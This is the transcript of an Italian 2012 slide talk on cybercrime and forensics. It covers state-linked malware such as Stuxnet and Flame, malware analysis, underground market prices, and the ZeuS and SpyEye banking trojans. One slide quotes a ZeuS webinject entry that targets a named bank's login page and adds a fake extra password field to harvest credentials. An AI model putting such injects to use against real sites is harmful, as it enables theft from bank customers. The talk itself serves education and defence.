Top Banner
Crimini Informatici 2012 Indagini Digitali in ambito Giudiziario e Forense Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.
44
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Crimini Informatici 2012

Crimini Informatici 2012Indagini Digitali in ambito Giudiziario e Forense

Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.

Page 2: Crimini Informatici 2012

Who is?

● Author: Gianni Amato● Site: www.securityside.it● Blog: www.gianniamato.it● Email: [email protected]● Twitter: @guelfoweb

IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.

Page 3: Crimini Informatici 2012

Cosa è il Cybercrime

● Un crimine come tutti gli altri, con l'aggiunta della componente informatica

● La componente informatica può essere il mezzo o l'obiettivo del crimine (o entrambi)

Page 4: Crimini Informatici 2012

Cominciamo dalla Cyberwar

Page 5: Crimini Informatici 2012

L'apocalisseCosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche

✔ Prenotazioni online di treni e aerei bloccate✔ Sistemi di controllo di linee aeree e treni in tilt✔ Le comunicazioni email interrotte✔ Caos nelle Pubbliche Amministrazioni✔ Raffinerie e Oleodotti fuori controllo✔ Acqua, gas, rete elettrica fuori uso

Page 6: Crimini Informatici 2012

Terrorismo?

● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.

Page 7: Crimini Informatici 2012

Impossibile che accada?

● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto.

– 2010: Stuxnet

– 2011: Duqu

– 2011: Gauss

– 2012: Mahdi

– 2012: Flame

– 2012: Wiper

– 2012: Shamoon

Page 8: Crimini Informatici 2012

Chi potrebbero essere gli artefici?

● Chiunque!– Dai servizi segreti ai gruppi di estremisti

– Dai militari ai terroristi

– Nazioni in contrasto da anni

Page 9: Crimini Informatici 2012

2010: Stuxnet

● Scoperto nel giugno 2010● Obiettivo: Sabotare il programma nucleare

Iraniano– Sistemi SCADA

● Windows + WinCC + PCS 7

● Progetto USA “Operation Olympic Games” iniziato da George W. Bush

– Si diffonde via USB

– Sfrutta vulnerabilità 0-day

Page 10: Crimini Informatici 2012

2010: Stuxnet

● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore

● Gli autori erano in possesso di certificati digitali: Realtek e JMicron

● Verisign revoca i certificati il 16 luglio● Il 17 luglio viene rilevata una nuova versione

di Stuxnet con i certificati rubati a Jmicron

Page 11: Crimini Informatici 2012

2010: Stuxnet

● Il valore numerico '1979050' trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato

come la possibile data di nascita di uno degli autori: 09/05/1979

● E' stato appurato che la data rilevata all'interno del codice di Stuxnet '24/6/12' coincide esattamente con la data del suo decesso

Page 12: Crimini Informatici 2012

2011: Duqu

● Scoperto nel settembre 2011● Condivide codice di Stuxnet (?)● Il target ancora una volta è l'Iran: valutare lo

stato del programma nucleare● Obiettivo diverso: furto di informazioni● Utilizza certificati rubati● Ha funzioni di keylogger● Sfrutta vulnerabilità 0-day (kernel Windows)

Page 13: Crimini Informatici 2012

2011: Gauss

● Scoperto nel settembre 2011● Rilevato in Libano, Israele, Palestina, Stati

Uniti e Emirati Arabi● Obiettivo: furto di password e conti bancari● Si ipotizza sia stato creato dagli stessi autori

di Stuxnet e Duqu

Page 14: Crimini Informatici 2012

2012: Mahdi

● Scoperto nel febbraio 2012● Il nome deriva da stringhe trovate nel codice

che fanno riferimento al Messia Islamico● Non si conoscono gli autori● Ha funzioni di keylogger e cattura schermate● Ruba file audio, file di testo e immagini● Sfrutta bug di Word e Power Point

Page 15: Crimini Informatici 2012

2012: Flame

● Scoperto nell'aprile 2012● Individuato da Kaspersky Lab in Iran (Iranian

Oil Minestry● CrySyS Lab sostiene che il malware potrebbe

essere online dal 2007● Si propaga tramite USB Key, nella rete locale

grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa

● Usa un falso certificato digitale

Page 16: Crimini Informatici 2012

2012: Flame

● Ha funzioni di keylogger● Cattura immagini● Registra l'audio (conversazioni via Skype)● Ruba documenti di testo e file DWG (Progetti

AutoCad)● Rilevate somiglianze con Stuxnet e Duqu ma

con un obiettivo diverso: spionaggio industriale

Page 17: Crimini Informatici 2012

2012: Flame risale al 2008?http://www.crysys.hu/skywiper/skywiper.pdf

● $ python peframe.py --export mssecmgr.ocx

● [IMAGE_EXPORT_DIRECTORY]

● 0x5F694 0x0 Characteristics: 0x0

● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC]

● 0x5F69C 0x8 MajorVersion: 0x0

● 0x5F69E 0xA MinorVersion: 0x0

● 0x5F6A0 0xC Name: 0x13C4EE

● 0x5F6A4 0x10 Base: 0x1

● 0x5F6A8 0x14 NumberOfFunctions: 0x5

● 0x5F6AC 0x18 NumberOfNames: 0x5

● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC

● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0

● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4

Page 18: Crimini Informatici 2012

2012: Wiper

● Un soldato inviato sul campo di battaglia per ripulire le tracce

● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu

● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet)

● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)

Page 19: Crimini Informatici 2012

2012: Shamoon

● Scoperto nel mese di agosto 2012● Shamoon è il nome trovato nel codice● Progettato per lo spionaggio● Ha preso di mira un ente petrolifero di Stato

Saudita● Cancella i dati del pc infetto sostituendoli con

delle immagini (una bandiera americana)● I file originali vengono verso un server

sconosciuto

Page 20: Crimini Informatici 2012

Perchè analizzare un Malware?

L'analisi è una procedura che va eseguita in laboratorio - quando è possibile - e consente di ricostruire la logica del malware per rispondere ai quattro quesiti che si presentano quando una macchina viene compromessa.

Page 21: Crimini Informatici 2012

I 4 Quesiti

● 1. Qual è lo scopo del malware? ● 2. Quali informazioni è riuscito a carpire? ● 3. Dove sono state trasmesse le informazioni? ● 4. Come ha fatto ad arrivare fin qui?

Page 22: Crimini Informatici 2012

Con cosa abbiamo a che fare?

● Persone altamente competenti● Codice è offuscato● Crittorgrafia (soprattutto durante la

trasmissione dei dati)● Funzioni di rootkit● Vulnerabilità 0-day

Page 23: Crimini Informatici 2012

Tipi di Analisi

● Analisi Statica– Codice

– Signature

– Evidence

● Analisi Dinamica– Comportamento

– Mutazioni

– Connessioni

Page 24: Crimini Informatici 2012

Remote Access Trojan

Page 25: Crimini Informatici 2012

Malware Anti-Analysis

● Anti Online-Analysis– ThreatExpert– CWSandbox– Anubis

● Anti Virtualizzation– VMware– Virtualbox– Virtual PC

● Anti Debug/Disass.– Softice– OllyDbg– IDA Pro

Page 26: Crimini Informatici 2012

Torniamo al Cybercrime

Page 27: Crimini Informatici 2012

Vulnerabilità Condivise

Page 28: Crimini Informatici 2012

Acquisti nell'Underground Russo

● Hacking a Gmail account: $162● Hacking a corporate mailbox: $500)● Scans of legitimate passports: $5 each● Winlocker ransomware: $10-20● Unintelligent exploit bundle: $25● Intelligent exploit bundle: $10-3,000● Traffic: $7-15 per 1,000 visitors for the most

valuable traffic (from the US and EU)

Page 29: Crimini Informatici 2012

Acquisti nell'Underground Russo

● Basic crypter (for inserting rogue code into a benign file): $10-30

● SOCKS bot (to get around firewalls): $100● Hiring a DDoS attack: $30-70 for a day,

$1,200 for a month● Email spam: $10 per one million e-mails● Expensive email spam (using a customer

database): $50-500 per one million e-mails

Page 30: Crimini Informatici 2012

Acquisti nell'Underground Russo

● SMS spam: $3-150 per 100-100,000 messages

● Bots for a botnet: $200 for 2,000 bots● DDoS botnet: $700● ZeuS source code: $200-$500● Windows rootkit (for installing malicious

drivers): $292● Hacking a Facebook or Twitter account: $130

Page 31: Crimini Informatici 2012

ZeuSUn progetto criminale (ora) Open Source

Page 32: Crimini Informatici 2012

ZeuS Info

● Online dal 2006● Scritto in Visual C++● Gli autori non amano chiamarlo Trojan,

Backdoor o Virus. Lo chiamano semplicemente “Bot”

● Prende di mira i sistemi MS Windows● Basato sulle intercettazioni delle WinAPI

Page 33: Crimini Informatici 2012

ZeuS Ring

● Ring3– Garantisce adattabilità e scalabilità

– Può operare in Guest User

Page 34: Crimini Informatici 2012

ZeuS Client Features

● Sniffer di traffico su protocollo TCP● Intercettazione di login FTP● Intercettazione di login POP3● Intercetta le chiamate alla libreria Wininet.dll

(usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS

● Encryption 1024-bit RSA

Page 35: Crimini Informatici 2012

ZeuS Server Features

● Usa Socks 4/4a/5 con supporto UDP e IPv6● Connessioni alla macchina infetta via FTP o

RDP● Screenshot in real time● Esecuzione comandi da remoto

Page 36: Crimini Informatici 2012

ZeuS HTTP-inject/HTTP-grabberwebinjects.txt

set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP

data_beforename="PASSWORD"*<tr>

data_enddata_inject

<td height="32" class="grigio10">password dispositiva <br/><input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub('PASSWORD', event);" tabindex="2" style="width: 110px;"/></td><td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td>

data_enddata_afterdata_end

Page 37: Crimini Informatici 2012

ZeuS HTTP-inject/HTTP-grabberBefore - After

Page 38: Crimini Informatici 2012

ZeuS Installation

✔Apache✔PHP✔MySql

Page 39: Crimini Informatici 2012

ZeuS Control Panel

Page 40: Crimini Informatici 2012

ZeuS Botnet

Page 41: Crimini Informatici 2012

Arriva la Concorrenza

La prima versione di SpyEye con opzione Kill ZeusNato per accaparrarsi una fetta del mercato di ZeuS

Page 42: Crimini Informatici 2012

SpyEye

● Presente dal 2009● Progettato dai Russi● Ha un costo di 500$ al mercato nero● Il business maggiore è basato sui plugin

Page 43: Crimini Informatici 2012

SpyEye + ZeuS

● Brute force password guessing● Jabber notification● VNC module● Auto-spreading● Auto-update● Screenshot system

Page 44: Crimini Informatici 2012

Domande?